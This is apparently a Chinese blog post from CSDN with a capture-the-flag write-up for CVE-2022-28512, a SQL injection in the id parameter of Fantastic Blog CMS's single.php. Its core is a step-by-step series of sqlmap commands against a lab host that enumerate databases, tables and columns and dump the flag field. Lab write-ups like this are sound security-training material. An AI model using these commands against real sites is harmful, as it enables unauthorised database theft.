CVE-2022-28512 Fantastic Blog CMS 存在SQL注入漏洞

最新推荐文章于 2023-11-19 00:26:30 发布
最新推荐文章于 2023-11-19 00:26:30 发布
阅读量680 收藏
点赞数 1
分类专栏: web渗透 CTF 数据库 文章标签: sql 安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38733240/article/details/127934168
版权
web渗透 同时被 3 个专栏收录
3 篇文章 0 订阅
订阅专栏
数据库
2 篇文章 0 订阅
订阅专栏
CTF
1 篇文章 0 订阅
订阅专栏

靶标介绍:

Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客,它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能,您无需接触任何代码即可启动并运行您的博客。 该CMS的/single.php路径下,id参数存在一个SQL注入漏洞。

根据题目提示,找到注入点

http://eci-2zedcqv70l1j4fp9hdfc.cloudeci1.ichunqiu.com/single.php?id=2

直接用sqlmap注入

1. 检查注入点:

​sqlmap -u http://eci-2zedcqv70l1j4fp9hdfc.cloudeci1.ichunqiu.com/single.php?id=2

2. 爆所有数据库信息:

sqlmap -u http://eci-2zedcqv70l1j4fp9hdfc.cloudeci1.ichunqiu.com/single.php?id=2 --dbs

3. 爆当前数据库信息:

sqlmap -u http://eci-2zedcqv70l1j4fp9hdfc.cloudeci1.ichunqiu.com/single.php?id=2 --current-db

4. 指定库名列出所有表

sqlmap -u http://eci-2zedcqv70l1j4fp9hdfc.cloudeci1.ichunqiu.com/single.php?id=2 -D ctf --tables

'ctf' 为指定数据库名称

5. 指定库名表名列出所有字段

sqlmap -u http://eci-2zedcqv70l1j4fp9hdfc.cloudeci1.ichunqiu.com/single.php?id=2 -D ctf -T flag --columns

'flag' 为指定表名称

6. 指定库名表名字段dump出指定字段

sqlmap -u http://eci-2zedcqv70l1j4fp9hdfc.cloudeci1.ichunqiu.com/single.php?id=2 -D ctf -T flag -C flag --dump

'flag' 为指定字段名称

flag如下:

 

XuanyuWq
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
铭飞CMS SQL注入漏洞复现(CNVD-2024-06148)
0xSec
04-30 629
由于铭飞CMS文章列表接口content/list.do中的sqlWhere参数缺少对外部输入SQL语句的验证,未经身份验证的攻击者可利用该漏洞获取数据库敏感数据,进一步利用可获取服务器权限。
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
春秋云境靶场CVE-2022-28512漏洞复现(sql手工注入)
zyh1588的博客
11-19 1403
小白复现CVE-2022-28512漏洞
pharmacy-management-system:具有完整功能的药房管理系统
03-11
药房管理系统 具有完整功能的药房管理系统Dmoe网址: ://trustonepharmacy.somrat.info/
CVE-2022-28512(Fantastic Blog (CMS))
qq_45092459的博客
11-27 1535
Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。打开标靶,有一个博客网站,发现有注册登录端口。我先是自己上套路走流程没有发现到sql注入,然后回去看了哈他的提示.结果漏洞存在于这个路径下,然后就是sqlmap一个跑就出来了。另外一种一句话直接出来所有的。
CVE-2022-28512 春秋云境.com
qq_42036164的博客
01-07 300
Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客,它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能,您无需接触任何代码即可启动并运行您的博客。该CMS的/single.php路径下,id参数存在一个SQL注入漏洞
春秋云镜wp day1
xy404的博客
10-13 3606
今天看到之前买了内网渗透那本书,今天看到靶场上线了,打一天玩一下,总体cve的洞很好刷,比打CTF轻松多了。
【春秋云境】CVE-2022-28512靶场WP
果粒程
11-26 1219
【春秋云境】CVE-2022-28512靶场WP
WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661.pdf
09-27
【WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661】是一个近期发现的安全问题,涉及到WordPress的核心函数`WP_Query`。这个漏洞并非直接的SQL注入,但因为`WP_Query`经常被WordPress插件广泛使用,所以其潜在的危害...
春秋云境 CVE-2022-4230 夺旗
最新发布
05-02
介绍如何 利用 CVE-2022-4230 的 WP Statistics WordPress 插件13.2.9 漏洞利用。 漏洞描述:WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认...
CVE-2022-28512
龙狼刺的博客
06-07 171
Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客,它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能,您无需接触任何代码即可启动并运行您的博客。该CMS的/single.php路径下,id参数存在一个SQL注入漏洞
春秋云境:CVE-2022-26965(后台RCE)
m0_65712192的博客
04-21 1566
Pluck-CMS-Pluck-4.7.16 后台RCE
【春秋云境】CVE-2022-28512
ZXW_NUDT的博客
02-22 2411
【春秋云境】CVE-2022-28512
春秋云镜 CVE-2022-26965
qq_22002773的博客
06-29 386
春秋云镜 CVE-2022-26965
【内网渗透】春秋云镜Intitle WP
Sapphire037的博客
04-23 2142
第一次正式接触内网渗透的东西,写的很新手,也适合新手观看,有问题可以私信或评论,接下来会持续更新。
WP-春秋云镜-Unauthorized靶场完全通关指南
qq_45234543的博客
11-23 1401
Unauthorized靶场完全通关指南,手把手教学拿到3个flag
春秋云境:CVE-2022-30887
一只爱吃橙子的羊
11-29 4000
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
Apache Spark 命令注入漏洞CVE-2022-33891)修复与利用
Apache Spark 命令注入漏洞CVE-2022-33891) Apache Spark 命令注入漏洞CVE-2022-33891)是 Apache Spark 中的一种高危漏洞,允许攻击者通过命令注入来执行恶意命令,从而控制服务器。该漏洞影响 Apache Spark ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值